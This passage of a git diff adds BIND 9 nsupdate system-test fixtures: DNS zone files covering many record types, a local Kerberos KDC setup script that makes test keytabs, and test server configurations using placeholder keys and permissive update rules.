"-22.6882" "116.8652" "250.0" +gpos02.example.nil. 3600 IN GPOS "" "" "" +hinfo01.example.nil. 3600 IN HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02.example.nil. 3600 IN HINFO "PC" "NetBSD" +isdn01.example.nil. 3600 IN ISDN "isdn-address" +isdn02.example.nil. 3600 IN ISDN "isdn-address" "subaddress" +isdn03.example.nil. 3600 IN ISDN "isdn-address" +isdn04.example.nil. 3600 IN ISDN "isdn-address" "subaddress" +key01.example.nil. 3600 IN KEY 512 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +kx01.example.nil. 3600 IN KX 10 kdc.example.nil. +kx02.example.nil. 3600 IN KX 10 . +loc01.example.nil. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02.example.nil. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01.example.nil. 3600 IN MG madname.example.nil. +mb02.example.nil. 3600 IN MG . +mg01.example.nil. 3600 IN MG mgmname.example.nil. +mg02.example.nil. 3600 IN MG . +minfo01.example.nil. 3600 IN MINFO rmailbx.example.nil. emailbx.example.nil. +minfo02.example.nil. 3600 IN MINFO . . +mr01.example.nil. 3600 IN MR mrname.example.nil. +mr02.example.nil. 3600 IN MR . +mx01.example.nil. 3600 IN MX 10 mail.example.nil. +mx02.example.nil. 3600 IN MX 10 . +naptr01.example.nil. 3600 IN NAPTR 0 0 "" "" "" . +naptr02.example.nil. 3600 IN NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +ns1.example.nil. 300 IN A 10.53.0.1 +ns2.example.nil. 300 IN A 10.53.0.2 +nsap-ptr01.example.nil. 3600 IN NSAP-PTR . +nsap-ptr01.example.nil. 3600 IN NSAP-PTR foo. +nsap01.example.nil. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02.example.nil. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01.example.nil. 3600 IN NXT a.secure.example.nil. NS SOA MX SIG KEY LOC NXT +nxt02.example.nil. 3600 IN NXT . NSAP-PTR NXT +nxt03.example.nil. 3600 IN NXT . A +nxt04.example.nil. 3600 IN NXT . 127 +ptr01.example.nil. 3600 IN PTR example.nil. +px01.example.nil. 3600 IN PX 65535 foo. bar. +px02.example.nil. 3600 IN PX 65535 . . +rp01.example.nil. 3600 IN RP mbox-dname.example.nil. txt-dname.example.nil. +rp02.example.nil. 3600 IN RP . . +rt01.example.nil. 3600 IN RT 0 intermediate-host.example.nil. +rt02.example.nil. 3600 IN RT 65535 . +s.example.nil. 300 IN NS ns.s.example.nil. +ns.s.example.nil. 300 IN A 73.80.65.49 +sig01.example.nil. 3600 IN SIG NXT 1 3 3600 20000102030405 19961211100908 2143 foo.example.nil. MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +srv01.example.nil. 3600 IN SRV 0 0 0 . +srv02.example.nil. 3600 IN SRV 65535 65535 65535 old-slow-box.example.com. +t.example.nil. 301 IN A 73.80.65.49 +txt01.example.nil. 3600 IN TXT "foo" +txt02.example.nil. 3600 IN TXT "foo" "bar" +txt03.example.nil. 3600 IN TXT "foo" +txt04.example.nil. 3600 IN TXT "foo" "bar" +txt05.example.nil. 3600 IN TXT "foo bar" +txt06.example.nil. 3600 IN TXT "foo bar" +txt07.example.nil. 3600 IN TXT "foo bar" +txt08.example.nil. 3600 IN TXT "foo\010bar" +txt09.example.nil. 3600 IN TXT "foo\010bar" +txt10.example.nil. 3600 IN TXT "foo bar" +txt11.example.nil. 3600 IN TXT "\"foo\"" +txt12.example.nil. 3600 IN TXT "\"foo\"" +u.example.nil. 300 IN TXT "txt-not-in-nxt" +a.u.example.nil. 300 IN A 73.80.65.49 +b.u.example.nil. 300 IN A 73.80.65.49 +wks01.example.nil. 3600 IN WKS 10.0.0.1 6 0 1 2 21 23 +wks02.example.nil. 3600 IN WKS 10.0.0.1 17 0 1 2 53 +wks03.example.nil. 3600 IN WKS 10.0.0.2 6 65535 +x2501.example.nil. 3600 IN X25 "123456789" +example.nil. 300 IN SOA ns1.example.nil. hostmaster.example.nil. 1 2000 2000 1814400 3600 diff --git a/bin/tests/system/nsupdate/krb/setup.sh b/bin/tests/system/nsupdate/krb/setup.sh new file mode 100644 index 0000000..5ac116c --- /dev/null +++ b/bin/tests/system/nsupdate/krb/setup.sh @@ -0,0 +1,117 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -x + +PWD=`pwd` + +KRB5_CONFIG="${PWD}/krb5.conf" +export KRB5_CONFIG + +KRB5_KDC_PROFILE=${PWD}/krb5kdc +export KRB5_KDC_PROFILE + +now=`date +%s` +lifetime=`expr 2147483647 - $now` +lifetime=`expr $lifetime / 3600 / 24 - 30` + +cat << EOF > "${KRB5_CONFIG}" +[libdefaults] + default_realm = EXAMPLE.COM + dns_lookup_kdc = false + # Depending on what you are testing, you may want something like: + # default_keytab_name = FILE:/usr/local/var/keytab +[realms] + EXAMPLE.COM = { + admin_server = 127.0.0.1:50001 + kdc = 127.0.0.1:50000 + database_module = DB2 + kdc_ports = 50000 + kadmind_port = 50001 + } +[dbmodules] + DB2 = { + db_library = db2 + } +[logging] + # Use any pathnames you want here. + kdc = FILE:${PWD}/kdc.log + admin_server = FILE:${PWD}/kadmin.log +# Depending on what you are testing, you may want: +# [domain_realm] +# your.domain = EXAMPLE.COM +EOF + +rm -rf ${KRB5_KDC_PROFILE} +mkdir -p ${KRB5_KDC_PROFILE} +chmod 700 ${KRB5_KDC_PROFILE} + +cat << EOF > "${KRB5_KDC_PROFILE}"/kdc.conf +[kdcdefaults] + kdc_ports = 50000 + kdc_tcp_ports = 50000 + +[realms] + EXAMPLE.COM = { + key_stash_file = ${KRB5_KDC_PROFILE}/.k5.EXAMPLE.COM + database_module = EXAMPLE.COM + max_life = ${lifetime}d +} + +[dbmodules] + EXAMPLE.COM = { + db_library = db2 + database_name = ${KRB5_KDC_PROFILE}/principal + } +EOF + +kdb5_util create -s <<EOF +master +master +EOF + +krb5kdc -n & +krb5kdcpid=$! +#trap "kill $krb5kdcpid; wait; trap 0; exit" 0 15 + + +kadmin.local addprinc -maxlife ${lifetime}d -randkey DNS/ns7.example.com@EXAMPLE.COM +kadmin.local addprinc -maxlife ${lifetime}d -randkey DNS/ns8.example.com@EXAMPLE.COM +kadmin.local addprinc -maxlife ${lifetime}d -randkey host/machine.example.com@EXAMPLE.COM + +kadmin.local ktadd -k ns7-server.keytab DNS/ns7.example.com@EXAMPLE.COM +kadmin.local ktadd -k ns8-server.keytab DNS/ns8.example.com@EXAMPLE.COM +kadmin.local ktadd -k krb5-machine.keytab host/machine.example.com@EXAMPLE.COM + +kadmin.local addprinc -maxlife ${lifetime}d -randkey 'DNS/ns9.example.com@EXAMPLE.COM' +kadmin.local addprinc -maxlife ${lifetime}d -randkey 'DNS/ns10.example.com@EXAMPLE.COM' +kadmin.local addprinc -maxlife ${lifetime}d -randkey 'machine$@EXAMPLE.COM' + +kadmin.local ktadd -k ns9-server.keytab 'DNS/ns9.example.com@EXAMPLE.COM' +kadmin.local ktadd -k ns10-server.keytab 'DNS/ns10.example.com@EXAMPLE.COM' +kadmin.local ktadd -k ms-machine.keytab 'machine$@EXAMPLE.COM' + +kinit -V -k -t krb5-machine.keytab -l ${lifetime}d -c krb5-machine.ccache host/machine.example.com@EXAMPLE.COM +kinit -V -k -t ms-machine.keytab -l ${lifetime}d -c ms-machine.ccache 'machine$@EXAMPLE.COM' + +cp ns7-server.keytab ../ns7/dns.keytab +cp ns8-server.keytab ../ns8/dns-other-than-KRB5_KTNAME.keytab +cp ns9-server.keytab ../ns9/dns.keytab +cp ns10-server.keytab ../ns10/dns.keytab + +cp krb5-machine.ccache ../ns7/machine.ccache +cp krb5-machine.ccache ../ns8/machine.ccache +cp ms-machine.ccache ../ns9/machine.ccache +cp ms-machine.ccache ../ns10/machine.ccache + +echo krb5kdc pid:$krb5kdcpid diff --git a/bin/tests/system/nsupdate/ns1/example1.db b/bin/tests/system/nsupdate/ns1/example1.db new file mode 100644 index 0000000..566b0a0 --- /dev/null +++ b/bin/tests/system/nsupdate/ns1/example1.db @@ -0,0 +1,146 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example.nil IN SOA ns1.example.nil. hostmaster.example.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example.nil. NS ns1.example.nil. +ns1.example.nil. A 10.53.0.1 +example.nil. NS ns2.example.nil. +ns2.example.nil. A 10.53.0.2 + +$ORIGIN example.nil. +* MX 10 mail +a TXT "foo foo foo" + PTR foo.net. +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . +$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +key01 KEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01 NXT a.secure ( NS SOA MX SIG KEY LOC NXT ) +nxt02 NXT . ( NSAP-PTR NXT ) +nxt03 NXT . ( A ) +nxt04 NXT . ( 127 ) +ptr01 PTR example.nil. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example.nil. +ns A 73.80.65.49 +$ORIGIN example.nil. +$TTL 3600 ; 1 hour +sig01 SIG NXT 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. +$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nxt" +$ORIGIN u.example.nil. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example.nil. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" diff --git a/bin/tests/system/nsupdate/ns1/many.test.db.in b/bin/tests/system/nsupdate/ns1/many.test.db.in new file mode 100644 index 0000000..824971b --- /dev/null +++ b/bin/tests/system/nsupdate/ns1/many.test.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns1.example.nil. hostmaster.example.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS ns1.example.nil. + NS ns2.example.nil. diff --git a/bin/tests/system/nsupdate/ns1/max-ttl.db b/bin/tests/system/nsupdate/ns1/max-ttl.db new file mode 100644 index 0000000..fea00b9 --- /dev/null +++ b/bin/tests/system/nsupdate/ns1/max-ttl.db @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +max-ttl.nil IN SOA ns1.max-ttl.nil. hostmaster.max-ttl.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +max-ttl.nil. NS ns1.max-ttl.nil. +ns1.max-ttl.nil. A 10.53.0.1 +max-ttl.nil. NS ns2.max-ttl.nil. +ns2.max-ttl.nil. A 10.53.0.2 + +$ORIGIN max-ttl.nil. +* MX 10 mail +a TXT "foo foo foo" + PTR foo.net. diff --git a/bin/tests/system/nsupdate/ns1/maxjournal.db.in b/bin/tests/system/nsupdate/ns1/maxjournal.db.in new file mode 100644 index 0000000..d64842b --- /dev/null +++ b/bin/tests/system/nsupdate/ns1/maxjournal.db.in @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns1.example.nil. hostmaster.example.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS ns1.example.nil. diff --git a/bin/tests/system/nsupdate/ns1/named.conf.in b/bin/tests/system/nsupdate/ns1/named.conf.in new file mode 100644 index 0000000..a5cc36d --- /dev/null +++ b/bin/tests/system/nsupdate/ns1/named.conf.in @@ -0,0 +1,162 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1 dscp 1; + notify-source 10.53.0.1 dscp 22; + transfer-source 10.53.0.1 dscp 3; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.1; 127.0.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + minimal-responses no; + update-quota 1; +}; + +acl named-acl { + any; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key altkey { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key restricted.example.nil { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key zonesub-key.example.nil { + algorithm hmac-md5; + secret "1234subk8765"; +}; + +include "ddns.key"; + +zone "example.nil" { + type primary; + file "example.db"; + check-integrity no; + check-mx ignore; + update-policy { + grant zonesub-key.example.nil zonesub TXT; + grant ddns-key.example.nil subdomain example.nil ANY; + grant restricted.example.nil subdomain restricted.example.nil ANY; + }; + allow-transfer { any; }; +}; + +zone "max-ttl.nil" { + type primary; + file "max-ttl.db"; + max-zone-ttl 300; + check-integrity no; + allow-update { named-acl; }; + allow-transfer { any; }; +}; + +zone "other.nil" { + type primary; + file "other.db"; + check-integrity no; + check-mx warn; + update-policy local; + allow-query { !10.53.0.2; any; }; + allow-query-on { 10.53.0.1; 127.0.0.1; }; + allow-transfer { any; }; +}; + +primaries others { + 10.53.0.2 port @PORT@; + 10.53.0.2 port @PORT@ key altkey; +}; + +zone "update.nil" { + type primary; + file "update.db"; + check-integrity no; + check-mx fail; + allow-update { any; }; + allow-transfer { any; }; + also-notify { others; }; +}; + +zone "unixtime.nil" { + type primary; + file "unixtime.db"; + check-integrity no; + allow-update { any; }; + allow-transfer { any; }; + serial-update-method unixtime; +}; + +zone "yyyymmddvv.nil" { + type primary; + file "yyyymmddvv.db"; + check-integrity no; + allow-update { any; }; + allow-transfer { any; }; + serial-update-method date; +}; + +include "md5.key"; +include "sha1.key"; +include "sha224.key"; +include "sha256.key"; +include "sha384.key"; +include "sha512.key"; + +zone "keytests.nil" { + type primary; + file "keytests.db"; + update-policy { + grant md5-key name md5.keytests.nil. ANY; + grant sha1-key name sha1.keytests.nil. ANY; + grant sha224-key name sha224.keytests.nil. ANY; + grant sha256-key name sha256.keytests.nil. ANY; + grant sha384-key name sha384.keytests.nil. ANY; + grant sha512-key name sha512.keytests.nil. ANY; + }; +}; + +zone "many.test" { + type primary; + allow-update { any; }; + file "many.test.db"; +}; + +zone "sample" { + type primary; + allow-update { any; }; + file "sample.db"; +}; + +zone "maxjournal.test" { + type primary; + allow-update { any; }; + file "maxjournal.db"; + max-journal-size default; +}; diff --git a/bin/tests/system/nsupdate/ns1/sample.db.in b/bin/tests/system/nsupdate/ns1/sample.db.in new file mode 100644 index 0000000..9118bef --- /dev/null +++ b/bin/tests/system/nsupdate/ns1/sample.db.in @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA ns1 . 0 0 0 0 0 +@ 0 NS ns1 +ns1 0 A 10.53.0.1 +; a RRset that exists +exists 0 TXT This RRset exists. +; nxdomain +; A named without a TXT RRset +no-txt 0 A 1.2.3.4 diff --git a/bin/tests/system/nsupdate/ns10/dns.keytab b/bin/tests/system/nsupdate/ns10/dns.keytab Binary files differnew file mode 100644 index 0000000..95eea90 --- /dev/null +++ b/bin/tests/system/nsupdate/ns10/dns.keytab diff --git a/bin/tests/system/nsupdate/ns10/example.com.db.in b/bin/tests/system/nsupdate/ns10/example.com.db.in new file mode 100644 index 0000000..da5cedf --- /dev/null +++ b/bin/tests/system/nsupdate/ns10/example.com.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns10.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns10 +ns10 A 10.53.0.10 diff --git a/bin/tests/system/nsupdate/ns10/in-addr.db.in b/bin/tests/system/nsupdate/ns10/in-addr.db.in new file mode 100644 index 0000000..da5cedf --- /dev/null +++ b/bin/tests/system/nsupdate/ns10/in-addr.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns10.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns10 +ns10 A 10.53.0.10 diff --git a/bin/tests/system/nsupdate/ns10/machine.ccache b/bin/tests/system/nsupdate/ns10/machine.ccache Binary files differnew file mode 100644 index 0000000..ced26bd --- /dev/null +++ b/bin/tests/system/nsupdate/ns10/machine.ccache diff --git a/bin/tests/system/nsupdate/ns10/named.conf.in b/bin/tests/system/nsupdate/ns10/named.conf.in new file mode 100644 index 0000000..001f78d --- /dev/null +++ b/bin/tests/system/nsupdate/ns10/named.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.10; + notify-source 10.53.0.10; + transfer-source 10.53.0.10; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.10; }; + recursion no; + notify yes; + minimal-responses no; + @TKEY_CONFIGURATION@ +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.10 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "in-addr.arpa" { + type primary; + file "in-addr.db"; + update-policy { grant EXAMPLE.COM ms-subdomain . PTR; }; +}; + +zone "example.com" { + type primary; + file "example.com.db"; + update-policy { + grant EXAMPLE.COM ms-selfsub . ANY; + grant EXAMPLE.COM ms-subdomain _tcp.example.com SRV; + }; +}; diff --git a/bin/tests/system/nsupdate/ns2/named.conf.in b/bin/tests/system/nsupdate/ns2/named.conf.in new file mode 100644 index 0000000..f1a1735 --- /dev/null +++ b/bin/tests/system/nsupdate/ns2/named.conf.in @@ -0,0 +1,74 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2 dscp 4; + notify-source 10.53.0.2 dscp 5; + transfer-source 10.53.0.2 dscp 6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + serial-query-rate 1; // workaround for KB AA-01213 +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key altkey { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +view alternate { + match-clients { key altkey; }; + + zone "update.nil" { + type secondary; + primaries { 10.53.0.1; }; + file "update.alt.bk"; + allow-transfer { any; }; + }; +}; + +view primary { + match-clients { any; }; + + zone "example.nil" { + type secondary; + primaries { 10.53.0.1; }; + file "example.bk"; + allow-transfer { any; }; + }; + + zone "update.nil" { + type secondary; + primaries { 10.53.0.1; }; + file "update.bk"; + allow-transfer { any; }; + }; + + zone "sample" { + type primary; + allow-update { any; }; + file "sample.db"; + }; +}; diff --git a/bin/tests/system/nsupdate/ns2/sample.db.in b/bin/tests/system/nsupdate/ns2/sample.db.in new file mode 100644 index 0000000..848cc86 --- /dev/null +++ b/bin/tests/system/nsupdate/ns2/sample.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA ns2 . 0 0 0 0 0 +@ 0 NS ns2 +ns2 0 A 10.53.0.2 +; +; These prerequistes are reversed, relative to ns1/sample.db.in: +; 'exists' does not exist. +nxdomain 0 TXT This RRset exists. + +; a name with a TXT RRset +no-txt 0 TXT This RRset exists diff --git a/bin/tests/system/nsupdate/ns3/delegation.test.db.in b/bin/tests/system/nsupdate/ns3/delegation.test.db.in new file mode 100644 index 0000000..195c73b --- /dev/null +++ b/bin/tests/system/nsupdate/ns3/delegation.test.db.in @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 10 +delegation.test. IN SOA delegation.test. hostmaster.delegation.test. 1 3600 900 2419200 3600 +delegation.test. IN NS delegation.test. +delegation.test. IN A 10.53.0.3 diff --git a/bin/tests/system/nsupdate/ns3/dnskey.test.db.in b/bin/tests/system/nsupdate/ns3/dnskey.test.db.in new file mode 100644 index 0000000..df503fe --- /dev/null +++ b/bin/tests/system/nsupdate/ns3/dnskey.test.db.in @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 10 +dnskey.test. IN SOA dnskey.test. hostmaster.dnskey.test. 1 3600 900 2419200 3600 +dnskey.test. IN NS dnskey.test. +dnskey.test. IN A 10.53.0.3 diff --git a/bin/tests/system/nsupdate/ns3/example.db.in b/bin/tests/system/nsupdate/ns3/example.db.in new file mode 100644 index 0000000..92c0998 --- /dev/null +++ b/bin/tests/system/nsupdate/ns3/example.db.in @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +example. 10 IN SOA example. hostmaster.example. 1 3600 900 2419200 3600 +example. 10 IN NS example. +example. 10 IN A 10.53.0.3 +example. 10 IN NSEC3PARAM 1 1 0 - diff --git a/bin/tests/system/nsupdate/ns3/multisigner.test.db.in 